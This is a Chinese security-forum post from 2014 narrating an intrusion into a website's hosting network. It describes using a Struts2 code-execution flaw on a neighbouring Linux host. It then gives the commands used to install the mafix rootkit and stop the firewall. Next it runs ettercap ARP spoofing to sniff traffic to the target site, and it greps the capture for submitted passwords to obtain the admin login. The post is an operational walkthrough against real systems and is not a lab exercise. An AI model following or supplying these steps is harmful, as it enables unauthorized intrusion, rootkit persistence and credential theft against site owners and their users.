首页
社区
课程
招聘
Linux下嗅探密码拿下服务器
发表于: 2014-12-31 15:01 733

Linux下嗅探密码拿下服务器

2014-12-31 15:01
733
0x01 主站踩点

主站dedecms 目前公布的0day没有一个能用的,并且后台不是默认的,google hack无果。

0x02 旁站分析

        旁站有二十多个,大部分是现场的cms的二次开发,没有漏洞,还有一个bbs dz,同样也没有漏洞

0x03 C段Linux主机突破

       查询C段 浏览网站 发现一个 ssss.com/login.action ,熟悉吧 struct2代码执行 不解释

0x04 Linux主机 栽Rookit

     

     这里我用的Rookit是mafix

   执行命令:

            tar zxvf mafix.tar.gz

     chmod +x root

   ./root password 23141

   Putty登录

      注意 如果防火墙开着的话,不愿意在防火墙里添加规则的话可以关掉防火墙

  停止防火墙

   /etc/init.d/iptables stop

版本
0x05  Linux主机 安装ettercap 嗅探密码

    1、 下载与安装EPEL的RPM包。

         rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm

           2、 yum -y install ettercap

    开始嗅探

    开启转发(可能不需要)

      echo 1 > /proc/sys/net/ipv4/ip_forward

    嗅探

     ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt

   嗅探时间可能会挺长 可以后台运行

     nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt

0x06 数据筛选

   由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出

   抓包分析出目标站前台提交的密码的字段 pwd

    cat /tmp/log.txt | grep –a “&pwd=” | more

   好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了

   www.xxx.com/xxx/login.php]http://www.xxx.com/xxx/login.php]www.xxx.com/xxx/login.php

0x07 上传一句话 root提权

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//